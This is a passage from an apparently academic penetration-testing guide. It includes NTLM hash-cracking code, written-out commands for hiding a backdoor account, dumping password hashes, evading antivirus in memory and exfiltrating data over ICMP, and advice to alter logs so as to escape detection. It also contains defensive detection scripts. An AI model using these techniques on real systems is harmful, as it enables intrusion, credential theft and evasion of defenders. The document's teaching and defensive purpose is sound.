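    ntlmv2_hash = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntlmv2_hash, server_challenge + blob, hashlib.md5).digest()


def hashcat_5600_line(user: str, domain: str, server_challenge: bytes, ntproofstr: bytes, blob: bytes) -> str:
    """USER::DOMAIN:CHALLENGE:NTPROOFSTR:BLOB, the form that hashcat -m 5600 and john --format=netntlmv2 read."""
    return f"{user}::{domain}:{server_challenge.hex()}:{ntproofstr.hex()}:{blob.hex()}"


def crack_nt(target: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Straight wordlist attack on a dumped NT hash (what hashcat -m 1000 -a 0 does)."""
    return next((w for w in wordlist if nt_hash(w) == target), None)


def crack_netntlmv2(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Straight wordlist attack on a captured NTLMv2 exchange (what hashcat -m 5600 -a 0 does)."""
    user, _, rest = line.partition("::")
    domain, challenge, proof, blob = rest.split(":")
    for w in wordlist:
        if netntlmv2(w, user, domain, bytes.fromhex(challenge), bytes.fromhex(blob)) == bytes.fromhex(proof):
            return w
    return None


# Constructed capture: the challenge and blob are made up here, not taken from a real network.
CHALLENGE = bytes.fromhex("0123456789abcdef")
BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("a1b2c3d4e5f60718") + b"\x00" * 8
CAPTURED_LINE = hashcat_5600_line("bob", "CORP", CHALLENGE,
                                  netntlmv2("Winter2019", "bob", "CORP", CHALLENGE, BLOB), BLOB)
WORDLIST = ["password", "Summer2019", "Fall2019", "Winter2019"]

if __name__ == "__main__":
    print(nt_hash("password").hex())              # 8846f7eaee8fb117ad06bdd830b7586c
    print(crack_netntlmv2(CAPTURED_LINE, WORDLIST))  # Winter2019
```

Two points the code makes that the commands alone do not: the NT hash is unsalted, so one wordlist pass covers every account that shares a password, and the Net-NTLMv2 response is salted by the challenge and blob, so it cannot be passed like an NT hash but must be cracked (or relayed) instead.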
Sood & Enbody (2014) explain that the process of gaining and maintaining access to a
computer often does not require a direct attack. The authors explain the principles behind the use
of phishing emails to gain access to a target machine. In the spear phishing model that the
authors present, located in Appendix B as Figure 6, the attacker sends an email to the target
user, and the email contains one or more malicious attachments that will infect the target
computer with a remote access trojan (RAT). A RAT provides the attacker with a backdoor into the
target machine. Once the RAT is on the target machine, it will either spread itself across the
target network, or the attacker will utilize the RAT to spread more RATs across the network (Sood
& Enbody, 2014, p. 23).
If the attacker is not caught by an IDS/IPS, they will eventually find a server that holds
sensitive data as they spread the RAT across the target network, and at that point the attacker
will have the ability to exfiltrate sensitive data in a manner that allows the attacker to elude
detection. This completes the attack in the spear phishing example, but there are steps after
exfiltration. One of the steps that usually follows exfiltration is covering tracks, which
includes deleting logs of the activity, removing any malware that was used to gain access to the
machine, and reversing any changes made to the machine's configuration (Sood & Enbody, 2014,
p. 23).
Another way to maintain persistence on a target device is to create a new user account and
add the account to local and domain groups, which helps the penetration tester blend in with the
rest of the activity happening on the computer. The account should be hidden from the logon
screen, and to do that the following registry edit is performed:
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v account_name /t REG_DWORD /d 0
This only hides the account from the welcome screen and the User Accounts control panel; it is
still visible to commands such as net user and in the security event log, so it is not a
substitute for covering tracks. The registry path can vary depending on the version of Windows
running on the target machine, but the general idea is the same (Velu, 2017, pp. 471-473).
Data gathering and extraction. Netcat can exfiltrate data from a target device. In order
to perform this function, the Netcat remote shell needs to have a connection to the attacker's
computer. The penetration tester also needs to know the path to the file that is to be
exfiltrated on the target device. To read the file through the shell, the 'tail' command can be
used. For example, if a penetration tester wanted to dump the Linux passwd file, they would run
the following command: tail /etc/passwd (Yerrid, 2013, pp. 40-41). Note that tail prints only the
last ten lines by default, so cat is used when the whole file is wanted, and that on modern Linux
systems the password hashes live in /etc/shadow, which requires root to read, rather than in
/etc/passwd. With the hashes in hand, the attacker can crack the password file offline and at
their leisure.
An issue with data exfiltration is the risk of being caught by data loss prevention.
Random access memory (RAM) holds a significant amount of information for an attacker. Tools
like Belkasoft RAM Capturer and Mandiant Memoryze can capture system memory, which can
then be downloaded as a single image file. Both tools are uploaded to the compromised machine
and used to perform the download of the system’s memory (Velu, 2017, p. 393).
If a penetration tester is trying to capture the active memory of a target, they would most
likely get caught by endpoint protection. In order to avoid this, Metasploit’s Meterpreter has an
execute command that can run an executable completely in the target machine’s memory, in the
form execute -H -m -d calc.exe -f <memory acquisition executable>, where -f names the program
to run. The command runs the calculator app (calc.exe) as a decoy executable and loads the
memory acquisition program into the system’s memory. Because a dummy program executes the
memory acquisition program, it avoids anti-virus. The memory acquisition program does not show
up as a running process because it is run in system memory, which assists in avoiding IDS/IPS
(Velu, 2017, pp. 394-395).
When exfiltrating information from a target on an organization’s domain, the Security
Account Manager (SAM) database is a prime target. The SAM database contains the usernames
and passwords for the Windows operating system. The passwords are stored as LM or NTLM
hashes in the registry hive. The file path for the SAM is %SystemRoot%\system32\config\SAM,
and the hive is mounted in the registry at HKLM\SAM (Teixeira, Singh, & Agarwal, 2018).
Metasploit has a module called Smart Hashdump that can import the password hashes
from the SAM database to the penetration tester’s machine, where the tester can crack hashes
offline. Once the Meterpreter shell is running on the target device and the shell has been placed
in the background of the tester’s terminal, the tester can run the Smart Hashdump module at the
following Metasploit path: post/windows/gather/smart_hashdump. Once the module settings
have been set and the module has finished running, the Windows password hashes are placed
into a file on the tester’s machine (Teixeira, Singh, & Agarwal, 2018, pp. 198-200).
Lastly, there is the data exfiltration toolkit (DET), which is a tool designed to test data
loss prevention (DLP). DET can exfiltrate data using different protocols and social media such as
Gmail and Twitter. DET uses a client-server architecture, so a server needs to be set up on the
tester’s machine and then a client needs to be installed on the target machine. Velu (2016)
provides the steps for downloading and configuring the DET tool for use. The tool is
downloaded from GitHub using the command ‘git clone https://github.com/sensepost/DET.git’.
Once the repository is cloned and the tester has navigated to the directory, the tester can use the
command ‘pip install -r requirements.txt’ and then the command ‘python det.py’ to complete the
installation of the tool. This is necessary because DET is not installed on Kali Linux by default
(Velu, 2017, pp. 469-471).
The tester can start the DET server using the following command:
python det.py -c ./config-sample.json -p icmp -L. This command starts the server with the
configuration set to listen for packets over Internet Control Message Protocol (ICMP). The
config-sample.json in the command is the configuration file. Once the setup is complete, the
tester can exfiltrate data from the target over ICMP, which obfuscates the traffic by making it
look like a ping and so helps evade DLP (Velu, 2017, pp. 469-471).
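As an added example, not code from the paper or the DET project, the following Python detector shows what a defender watching for this ICMP channel would measure: stock ping carries a fixed filler payload (an alphabet string on Windows, a timestamp followed by the bytes 0x10, 0x11, 0x12, ... on Linux), whereas exfiltration payloads change from packet to packet. The packets are constructed (source, destination, payload) records rather than a capture, the addresses are documentation ranges, and the exfiltration payloads are pseudo-random stand-ins for DET's encoded chunks.

```python
import hashlib
from collections import defaultdict

# Stock echo-request filler sent by the Windows ping command.
WINDOWS_FILLER = b"abcdefghijklmnopqrstuvwabcdefghi"


def looks_like_ping(payload: bytes) -> bool:
    """True if the payload is the default filler of a Windows or Linux ping."""
    if payload == WINDOWS_FILLER:
        return True
    # Linux ping puts a timestamp first (8 or 16 bytes depending on platform),
    # then fills the rest with the ascending byte pattern 0x10, 0x11, 0x12, ...
    for ts_len in (8, 16):
        body = payload[ts_len:]
        if body and body == bytes((0x10 + i) & 0xFF for i in range(len(body))):
            return True
    return False


def score_flow(payloads, min_packets=5):
    """Summarise one src->dst stream of echo-request payloads."""
    n = len(payloads)
    non_filler = [p for p in payloads if not looks_like_ping(p)]
    distinct = len(set(non_filler))
    verdict = (n >= min_packets
               and len(non_filler) / n > 0.5                    # mostly not stock ping
               and distinct / max(len(non_filler), 1) > 0.5)    # and the bodies keep changing
    return {
        "packets": n,
        "non_filler": len(non_filler),
        "distinct_non_filler": distinct,
        "payload_sizes": sorted({len(p) for p in payloads}),
        "bytes_carried": sum(len(p) for p in non_filler),  # upper bound on data moved out
        "suspicious": verdict,
    }


def analyze(packets):
    """Group (src, dst, payload) echo requests by flow and score each flow."""
    flows = defaultdict(list)
    for src, dst, payload in packets:
        flows[(src, dst)].append(payload)
    return {flow: score_flow(p) for flow, p in flows.items()}


def build_sample_packets():
    """Constructed traffic: six Linux pings, then eight DET-style data chunks."""
    packets = []
    for i in range(6):  # benign: 16-byte timestamp + 40 filler bytes = 56 bytes
        ts = (1575190000 + i).to_bytes(8, "little") + (4200 * i).to_bytes(8, "little")
        packets.append(("192.0.2.10", "192.0.2.1", ts + bytes(range(0x10, 0x38))))
    for i in range(8):  # exfil: varying, high-entropy chunks of differing sizes
        chunk = hashlib.sha256(b"constructed-det-chunk-%d" % i).digest()[: 32 - (i % 3)]
        packets.append(("192.0.2.10", "203.0.113.9", chunk))
    return packets


if __name__ == "__main__":
    for (src, dst), result in analyze(build_sample_packets()).items():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{src} -> {dst}: {flag} {result}")
```

On real traffic the same scoring would be run per flow over a time window, with the ICMP payloads taken from a packet capture or a sensor's ICMP logs.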
Covering tracks. Removing evidence and indicators of compromise is the second to last
step of a penetration test. Log deletion and removal of installed software is part of covering the
tracks left by a penetration test. Log deletion during the penetration test is part of maintaining
stealth on the network to IDS and IPS (Allen & Cardwell, 2016, pp. 331-344).
Cleaning up log files and modifying registry settings and values are important when
trying to avoid detection. Deletion of a log file is more suspicious than a modification of a
log file, especially if the modification is performed with system level permissions on a Windows
server, or root permissions on a Linux device. It is advisable to modify logs instead of deleting
them (Allen & Cardwell, 2016, pp. 331-344).
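As an added example, not from the paper or the cited books, the following Python script shows how a defender would surface two of the activities described above, a new account that is added to a group and then hidden through the SpecialAccounts\UserList registry value, and an event log being cleared, from forwarded Windows event records. The records are constructed JSON lines, and their field names (event_id, target_user, object_name, new_value) are this example's own, not any product's schema.

```python
import json
from collections import defaultdict

# Windows event IDs the rules below key on (Security log unless noted).
USER_CREATED = 4720          # a user account was created
LOCAL_GROUP_ADD = 4732       # member added to a security-enabled local group
GLOBAL_GROUP_ADD = 4728      # member added to a security-enabled global group
REGISTRY_VALUE_SET = 4657    # a registry value was modified (object auditing enabled)
AUDIT_LOG_CLEARED = 1102     # the Security log was cleared
EVENT_LOG_CLEARED = 104      # an event log was cleared (System log, Eventlog source)

# Setting <account> = 0 under this key hides the account from the logon screen.
HIDDEN_USER_KEY = r"\Winlogon\SpecialAccounts\UserList"

# Constructed sample records, not real telemetry; field names are this example's own.
SAMPLE_EVENTS = r"""
{"ts": "2019-12-01T09:00:01Z", "host": "FS01", "event_id": 4624, "target_user": "alice"}
{"ts": "2019-12-01T09:05:10Z", "host": "FS01", "event_id": 4720, "subject_user": "alice", "target_user": "svc_backup2"}
{"ts": "2019-12-01T09:05:12Z", "host": "FS01", "event_id": 4732, "subject_user": "alice", "target_user": "svc_backup2", "group": "Administrators"}
{"ts": "2019-12-01T09:06:40Z", "host": "FS01", "event_id": 4657, "subject_user": "alice", "object_name": "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", "value_name": "svc_backup2", "new_value": "0"}
{"ts": "2019-12-01T09:30:00Z", "host": "FS01", "event_id": 4720, "subject_user": "helpdesk", "target_user": "jdoe"}
{"ts": "2019-12-01T17:45:03Z", "host": "FS01", "event_id": 1102, "subject_user": "alice"}
"""


def parse_events(text):
    """Parse JSON-lines event records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Run the rules over events in order; return (rule, host, detail) findings."""
    findings = []
    created = defaultdict(set)  # host -> accounts created earlier in this stream
    for ev in events:
        eid, host = ev["event_id"], ev["host"]
        if eid == USER_CREATED:
            created[host].add(ev["target_user"])
        elif eid in (LOCAL_GROUP_ADD, GLOBAL_GROUP_ADD):
            # A brand-new account landing in a group is the persistence pattern;
            # a routine account creation with no group change (jdoe) does not fire.
            user = ev["target_user"]
            if user in created[host]:
                findings.append(("new-account-added-to-group", host,
                                 f"{user} -> {ev.get('group', '?')}"))
        elif eid == REGISTRY_VALUE_SET:
            obj = ev.get("object_name", "")
            if obj.lower().endswith(HIDDEN_USER_KEY.lower()) and ev.get("new_value") == "0":
                user = ev.get("value_name", "?")
                tag = " (created earlier in this log)" if user in created[host] else ""
                findings.append(("account-hidden-from-logon", host, user + tag))
        elif eid in (AUDIT_LOG_CLEARED, EVENT_LOG_CLEARED):
            # Log clearing is the covering-tracks step; it is rare in normal operations.
            findings.append(("event-log-cleared", host, ev.get("subject_user", "?")))
    return findings


if __name__ == "__main__":
    for rule, host, detail in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{host}: {rule}: {detail}")
```

Event 4657 only appears if object access auditing is configured on the Winlogon key; without it, the hidden-account rule needs a periodic comparison of that key's values against the local account list instead.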
Removing software, programs, script files and applications used for testing is also an
important step because the software could be used in the future by malicious attackers to
compromise the organization. Leaving the network clean and pristine once testing concludes
shows the organization that the tester possesses professionalism and attention to detail. A
common issue faced during post-test clean-up activities is remembering everything that needs to
be removed or reconfigured. Keeping detailed records and logs of the test, including what
software, programs, script files and applications were placed on the target devices, will assist in
cleanup after testing has concluded. Detailed records also assist in creating the penetration test
report for the organization (Allen & Cardwell, 2016, pp. 331-344).
Discussion of the Findings
The purpose of this research was to provide guidance regarding the steps for performing a
penetration test using the most common open-source tools in the three main fields of penetration
testing: wireless, web application, and Intranet. This guidance is for those who possess a deep
understanding of the technical aspects of IT, are passionate about cybersecurity and want a
starting framework that they can utilize in the development of their own penetration testing
methodology.
In order to demonstrate the benefits of these tools, they need to be tested. In this section,
the tools that are tested are: Nmap, ZAP, Nikto, Metasploit, enum4linux, and OpenVAS. I used
devices in hackthebox.eu: 10.10.10.169, 10.10.10.168 and 10.10.10.157. 10.10.10.168 and
10.10.10.157 use Linux operating systems. 10.10.10.169 is a Windows device.
Wireless Tool Benefits
The Aircrack-ng toolset and Kismet tool are the two most commonly used toolsets for
wireless penetration testing given their wide range of capabilities and easy-to-use command line
interfaces. Aircrack-ng hosts multiple tools within its toolset that perform different functions
regarding wireless security testing, credential harvesting and end-point compromise.
Kismet is another wireless security tool known for its ability to assess the security
protocols of wireless networks without connecting to them, as well as identifying networks that
are not on the IEEE 802.11 standard spectrum.
Web Application Testing Results
In web application security testing, there are four main tools used: OWASP’s ZAP,
Nikto, SQLMap, and Burpsuite. Each tool is special in its capabilities and user interface. ZAP
and Burpsuite utilize a graphical user interface (GUI), whereas SQLMap uses a CLI. ZAP uses both
automatic and manual web application security scanning, while Burpsuite utilizes manual testing
as a proxy between the tester’s browser and the web application. ZAP and Burpsuite focus on
web application security testing in a broad sense, whereas SQLMap focuses on SQL vulnerabilities
within the web application. These are the most commonly used tools for web application security
testing, and penetration testers will be required to familiarize themselves with these tools and how
they function in order to be well-rounded testers.
The first tool tested for web application security was Nikto. To run the initial scan, the
first command was ‘nikto -host 10.10.10.157’. The default port for Nikto is 80 if there is not a
specified port in the command. Port 80 was found to be an open port during the Nmap scan that
was run during discovery and enumeration in the next section. The results of the Nikto scan are
shown in Figure 7.
Figure 7. Nikto Command and Output From a Generic Scan
Nikto found that the Apache version is out of date and could contain vulnerabilities that a
tester can research online. The Nikto scan also displays the types of HTTP methods that the web
application allows. The HTTP POST method can be a vulnerability if the website had a login
form, where password spraying may occur.
ZAP testing resulted in the discovery that the new Kali Linux version does not contain
ZAP by default, so to install ZAP, the following command must be used: ‘apt-get install
owasp-zap’. Once the installation was complete, the command ‘owasp-zap’ started the program.
From the home screen, the automated scan was selected, which was where the specifics were
entered. See Figure 8 for a screenshot of the configuration page. See Figures 8 and 9 for the
results of the scan.
Figure 8. ZAP Automated Scan Configuration Screen
Note: This screenshot illustrates the input of variables into the scan configuration screen.
Figure 9. ZAP Automated Scan Results
Note: This figure illustrates the results of the scan and the tabbed options that show various other
result information.
ZAP searches for known common URL paths and presents the findings, which can be
sorted for convenience. An example would be Figure 9, which shows the column ‘Reason’ sorted
to show the ‘OK’ reason at the top. This means that the URL exists and returned results when
tested. Much like Nikto, ZAP scans for many URLs and other criteria to present.
Intranet Security Testing Results
The tools for Intranet testing depend on the stage of testing that the penetration tester is
working in. The stages of a penetration test are discovery, enumeration, exploitation, privilege
escalation, persistence, covering tracks, and reporting (Ali, Allen, & Heriyanto, 2014, pp. 60-66).
Each stage has a set of tools that work best for what the analyst is trying to accomplish.
Nmap is the most recommended tool for discovery scanning and vulnerability
enumeration. Nmap has been around since 1997 and has been improved over the years so it can
perform a wide range of functions. Syntax for the tool is straight-forward and there is no
shortage of resources that can guide a new penetration tester to the best scan for the environment
they are testing. Between live asset discovery, open port scanning, service version detection, OS
fingerprinting, built-in scripts and scripting capabilities, there are few operations this tool cannot
perform (Lyon, 2008).
When testing Nmap, a tester must perform scans of devices on a network. The first
command run was ‘nmap -v -p- 10.10.10.157 -oG 157portscan.txt’. This scans all of the ports
on the device and outputs the results in grepable format to the 157portscan.txt file. Once Nmap
displayed the open ports in the output, a service version scan was run that also obtains the info
for the OS and runs Nmap scripts. See Figure 10 for the Nmap command and results.
Figure 10. Nmap device enumeration command
Note: This figure illustrates the command switches that identify the service version of the listed
ports and the operating system.
As shown in Figure 10, the Apache version of the web server running on port 80 is 2.4.29.
This seems like an older version of Apache, and a penetration tester will be able to research that
version of Apache to find known vulnerabilities.
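As an added example, not the paper's or Nmap's own code, the following Python script parses the grepable output that -oG writes (as in the 157portscan.txt scan above) and flags open services whose detected version is older than a baseline of the reader's choosing. The sample text is constructed in the -oG format rather than copied from the figure, and the baseline versions are illustrative values for this example, not a claim that any particular version is vulnerable.

```python
import re

# Constructed sample in Nmap's grepable (-oG) format: tabs separate the fields and
# each port entry is "port/state/proto/owner/service/rpcinfo/version/".
SAMPLE_OG = """\
# Nmap 7.80 scan initiated Sun Dec  1 10:00:00 2019 as: nmap -sV -O -oG 157portscan.txt 10.10.10.157
Host: 10.10.10.157 ()\tStatus: Up
Host: 10.10.10.157 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/, 443/filtered/tcp//https///\tIgnored State: closed (65532)
# Nmap done at Sun Dec  1 10:00:20 2019 -- 1 IP address (1 host up) scanned in 20.00 seconds
"""

# Illustrative minimum versions chosen for this example (product -> version tuple).
BASELINE = {"Apache httpd": (2, 4, 41), "OpenSSH": (8, 0)}

# Product name, then the first dotted numeric version ("7.6" out of "OpenSSH 7.6p1 ...").
VERSION_RE = re.compile(r"^(?P<product>.+?)\s+(?P<ver>\d+(?:\.\d+)*)")


def parse_grepable(text):
    """Return one record per port from -oG text; comment and status-only lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.partition(": ")[::2] for f in line.split("\t"))
        if "Ports" not in fields:
            continue
        host = fields["Host"].split()[0]
        for entry in fields["Ports"].split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            records.append({
                "host": host,
                "port": int(parts[0]),
                "state": parts[1],
                "proto": parts[2],
                "service": parts[4],
                # the version field may itself contain '/', so rejoin the tail
                "version": "/".join(parts[6:]).rstrip("/"),
            })
    return records


def parse_version(version):
    """Split 'Apache httpd 2.4.29 ((Ubuntu))' into ('Apache httpd', (2, 4, 29))."""
    m = VERSION_RE.match(version)
    if not m:
        return None, ()
    return m.group("product"), tuple(int(x) for x in m.group("ver").split("."))


def triage(records, baseline=BASELINE):
    """List open services whose detected version is below the baseline."""
    flagged = []
    for r in records:
        if r["state"] != "open" or not r["version"]:
            continue
        product, ver = parse_version(r["version"])
        if product in baseline and ver < baseline[product]:
            flagged.append((r["host"], r["port"], product,
                            ".".join(map(str, ver)), ".".join(map(str, baseline[product]))))
    return flagged


if __name__ == "__main__":
    recs = parse_grepable(SAMPLE_OG)
    for r in recs:
        print(f"{r['host']}:{r['port']}/{r['proto']} {r['state']} {r['service']} {r['version']}")
    for host, port, product, ver, base in triage(recs):
        print(f"REVIEW {host}:{port} {product} {ver} is below baseline {base}")
```

A flagged entry is a prompt to look the version up, as the text recommends; the baseline dictionary is where an organisation's own minimum supported versions would go.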
OpenVAS is also a well-known scanning tool used specifically for vulnerability detection
and exploit recommendations. It can perform automated scanning and will display vulnerability
information. This is more detail than Nmap, which displays raw information that the tester must
research to determine if there are vulnerabilities. When enumerating with Nmap, success boils
down to a penetration tester’s familiarity with known vulnerabilities corresponding to different
service versions, and their understanding of how these services function on different ports.
In this example, OpenVAS can be installed using the command ‘apt-get install openvas’.
Once OpenVAS is installed, it needs to be set up using the command ‘openvas-setup’. After setup
is complete, the login username and password appear at the bottom of the terminal, and
the web user interface (UI) at the URL https://127.0.0.1:9392 was loaded. Since the login
information was provided during setup, it is easy to log in to the web UI. To start a scan, click on
the scan tab at the top of the page, click on the tasks option in the dropdown menu, and then click
on the purple task manager icon on the top left side (see Figure 11 for a screenshot).
Figure 11. How to Start a Scan in OpenVAS
Note: This illustrates the icons to click to start a scan in OpenVAS
At the bottom of Figure 11, the scan status is illustrated and the tool is set to refresh every
30 seconds. This begins the OpenVAS vulnerability scan of the IP 10.10.10.157. When the scan
was finished, the status of the scan changed from ‘Requested’ to ‘Done’, which allows the user
to view the vulnerability results as shown in Figure 12. The vulnerabilities will allow a tester to
determine what offensive actions can be taken to compromise the system.
Figure 12. Results From OpenVAS Scan
Note: This illustrates the list of vulnerabilities found from the scan of the IP address
10.10.10.157 in OpenVAS
When working on enumeration, enum4linux is a reputable resource. When performing
discovery scanning, it was determined that 10.10.10.169 has Lightweight Directory Access
Protocol (LDAP) running, which is how Windows authenticates credentials on a domain. Using
enum4linux with no passwords given and the -a modifier, making the command ‘enum4linux -a
10.10.10.169’, the scan returned valuable data. The most important data was the list of users in
the AD group ‘Domain Users’. See Figure 13 for the screenshot of this output.
Figure 13. Enum4linux LDAP Output
Note: This lists the user accounts found in the active directory group ‘Domain Users’ during the
enumeration of LDAP using enum4linux
In addition to the list of users in the ‘Domain Users’ group, there was the list of all users
within the entire domain. See Figure 14 for the screenshot of all users. Other information
provided by this tool is the password policy for the domain “megabank”, which is the domain for
the server. See Figure 15 for the password policy screenshot.
Figure 14. Enum4linux Users Output
Note: This screenshot lists all the user accounts found on 10.10.10.169 during LDAP
enumeration
Figure 15. Enum4linux Password Policy Output
Note: This figure illustrates the fact that the password policy can be found in the output of the
LDAP enumeration using enum4linux
Enum4linux is a useful tool that can provide valuable information when used correctly.
Once the target is known and enumerated, exploitation and gaining access to the machines are
the next steps. When it comes to exploitation, Metasploit is second to none. Metasploit is the
most commonly used tool for exploiting vulnerabilities, as it has pre-configured exploit modules
that were designed to exploit specific vulnerabilities. This allows for exploit automation and the
capability for a less-advanced penetration tester to perform exploitation of vulnerabilities that
they would otherwise not have had the technical capabilities to perform. The tool also includes
modules for scanning, enumeration, exploitation and post-exploitation.
Post-exploitation and persistence are part of what allows a penetration tester to continue a
test after initial exploitation and access to a machine. This includes privilege escalation, moving
laterally to other machines across the intranet, monitoring and logging on devices, and the
creation of backdoors for future access. Because of the multitude of tasks involved, there are
tools designed to assist in the performance of each specific task, and the choice of tool can
depend on the OS of the compromised machine.
Obtaining and using passwords found on a machine is one way to gain access while
remaining anonymous on the network. Utilizing authorized credentials allows for easier access to
a machine remotely by installing backdoors, but it also allows the penetration tester to look at
file shares and the security account manager (SAM) database without arousing suspicion. This is
a very important step in the penetration testing methodology for initially obtaining and
maintaining access. Domain user accounts provide access to any computers and file shares that
the domain user has access to, which is beneficial for spreading across the network. A domain
administrator account provides more access to all of the devices on the organization’s domain,
including administrative permissions to all of the servers and workstations.
Netcat can be used as a backdoor and for data exfiltration. Metasploit’s Meterpreter is
also used for creating and maintaining a backdoor onto the machine. Meterpreter includes
stealth capabilities by executing commands using dummy processes and having those processes
use the Windows command shell in the background for executing commands remotely. This is
one way of bypassing anti-virus (AV) and IDS. Meterpreter also has a module called Smart
Hashdump that can download the local running memory of the machine for analysis. Other open-
source tools in Kali Linux are made for downloading local memory, such as Belkasoft RAM
Capturer and Mandiant Memoryze. Lastly, the Data Exfiltration Tool (DET) is specifically made
for exfiltrating data discreetly and was designed for data loss prevention (DLP) testing.
Remaining undetected is critical for a penetration tester, and each tool has functions
designed to assist in obfuscation and stealth. Tools are not enough to remain undetected when
performing a penetration test. A penetration tester must use knowledge of networking and OS
operations and configurations in order to stay hidden from IDS/IPS. Creating legitimate local and
AD accounts for persistence will reduce the likelihood that future activities will be viewed as
suspicious by a security information and event management (SIEM) system or user behavioral
analytics (UBA).
After the penetration test completes, it is important to remove anything on the
organization’s network and systems that has not been removed already. This includes deleting
any accounts created, resetting any permissions and registry keys modified, and removing any
software or files/folders placed on devices. Cleaning up and removing anything that could be
used by a real attacker in the future is part of the penetration testing process and should never be
skipped or taken lightly. The purpose of a security analysis and penetration test is to benefit the
organization by highlighting security weaknesses, thus increasing the organization’s security
posture. When an analysis or test places the organization at greater risk, it constitutes a failure
of that test and of the testers.
Commonalities
There were several commonalities that were found between the different penetration
testing sections and toolsets. According to the Literature Review, the first step in any penetration
test is intelligence gathering, regardless of which portion of an organization is being tested.
Knowing as much as possible about the organization’s operations, people, and threat vectors is
necessary for a strong beginning to a penetration test. OSINT is the practice of gathering
information from open-source tools and platforms, such as social media and search engines.
Social engineering is one of the main reasons for performing OSINT, as it may be useful to know
certain personal information in order to craft a social engineering attack that has the highest
chance of successfully obtaining sensitive information. A penetration tester can easily compromise
an organization by tricking one of their employees into opening a malicious attachment containing
custom malware. This could compromise the machine and give the penetration tester credentials
that they could use to perform other penetration tests, such as wireless or intranet testing.
Another commonality was the penetration testing tools used for different testing fields. In
both wireless network security testing and intranet security testing, decryption or hash-cracking
was required for various reasons. John the Ripper (JTR) was suggested for hash-cracking and
decryption in both wireless and physical network security as it has the capability to crack
encryption and hashes for both passwords and wireless security protocols. JTR was also
suggested for cracking the hashes of Windows credentials taken from a compromised machine.
There are also areas where testing fields become sub-tasks for one another. For example,
there may be web applications discovered during an intranet penetration test. Organizations
often use web portals for corporate tool and resource logins, such as SolarWinds’ Orion network
solution. Orion can be used as an organization’s IP Address Management (IPAM) resource,
which would allow the tester to view what each subnet of the company’s intranet is used for, and
even view what devices are using which IP address within those networks. This would allow the
tester to focus on the high-value targets, such as the domain controller (DC), the domain name
server (DNS), database servers and others.
One tool that mixes wireless security testing and end-point compromise is Aircrack-ng.
Aircrack-ng allows for the performance of man-in-the-middle attacks that could either
compromise a workstation or get credentials from the user. Credentials phished from a user using
a fake wireless logon page could be used during intranet security testing when the penetration
tester wants to perform privilege escalation or move laterally across the network.
Web application, wireless and Intranet testing merge when a web application has been
compromised, which can provide credentials to access a wireless network where Intranet testing
can begin. Compromising Internet-facing web applications can also provide access to the web
server itself, which in turn can provide the tester with access to an internal network depending on
the way the organization has its web servers networked.
Many variables determine the paths that an analyst takes during a penetration test. There
are several points where wireless testing, web application testing, and intranet testing intersect
during a fully scoped penetration test. Having a good toolset, along with in-depth knowledge of
those tools, will provide a penetration tester with the ability to perform the test and be successful.
For wireless testing, Kismet and the Aircrack-ng tool suite are the tools that will provide the best
results. ZAP, Nikto, SQLMap and Burpsuite are the best tools for testing web application
security. Nmap, OpenVAS, Metasploit, Meterpreter, Netcat, and DET are comprehensive tools
that will provide the best results during the first five stages of an intranet penetration test.
Keeping detailed records and logs of the penetration test is the best practice for successfully
performing the final two stages of a penetration test.
Conclusion
A lack of advanced knowledge and experience of cybersecurity technologies and
concepts is the main factor that keeps information technology professionals away from the
cybersecurity industry. Knowledge of advanced information technology functions and familiarity
with cybersecurity processes and technologies are required to begin a career in cybersecurity.
Knowing where to begin can be difficult, and there are many separate but beneficial sources
containing information about cybersecurity processes and technologies. Few sources have
combined information into a penetration testing template with tool use and syntax for performing
a penetration test.
There is no shortage of tools available for security and penetration testing. Many tools
have enough functionality, but not all of the tools are user-friendly or cover a wide range of
functions. Some tools are specifically designed to test one aspect of an environment, such as
wireless networks or SQL. Other tools can perform multiple functions, such as Nmap, which
performs network discovery and enumeration, or Metasploit that can perform functions at every
stage of the penetration testing process. Some tools are more commonly used and more popular
than others, depending on their effectiveness. Because those tools are often more effective, it is
beneficial for a prospective penetration tester or security analyst to learn the purpose, scope, and
syntax for each of these tools. Not all the tools and toolsets are executed using the command line,
but familiarity with the tool’s capabilities and operation are required for effectiveness.
Understanding a tool’s capabilities and operations is only part of the process of a
penetration test. An analyst must know the penetration testing process through standards and
authoritative sources. The penetration testing standard is a guide that can help a new tester with
the methodology and mindset required to perform a thorough and successful test and analysis of
an organization’s information systems security. The ability to be inquisitive, read logs and
investigate leads is a penetration tester’s personal strength and skill outside of their toolsets.
Security analysis and testing is a job for those who have a passion for cybersecurity work.
An ability to think outside of the box is required when searching for vulnerabilities that everyone
else has yet to find. The tester’s tools are their arsenal, which allows them to use their
knowledge, inquisitiveness, and passion to perform an analysis and penetration test.
There are always going to be new technologies being used by organizations around the
world, and technology is always going to evolve. A pentester must constantly learn about new
technologies that are available and be ready to perform an analysis and test those devices,
programs, protocols and processes. Knowledge, experience, passion, inquisitiveness, and an
understanding of the toolsets will begin a career in cybersecurity. Continuous education is the
key to a career in cybersecurity.
References
Ahmadzadeh, A., Hajihassani, O., & Gorgin, S. (2017). A high-performance and energy-efficient
exhaustive key search approach via GPU on DES-like cryptosystems. The Journal of
Supercomputing.
Ali, S., Allen, L., & Heriyanto, T. (2014). Kali Linux – Assuring Security by Penetration
Testing. Birmingham, UK: Packt Publishing.
Alisherov, F., & Sattarova, F. (2009). Methodology for Penetration Testing. Sandy Bay,
Tasmania, Australia: International Journal of Grid and Distributed Computing.
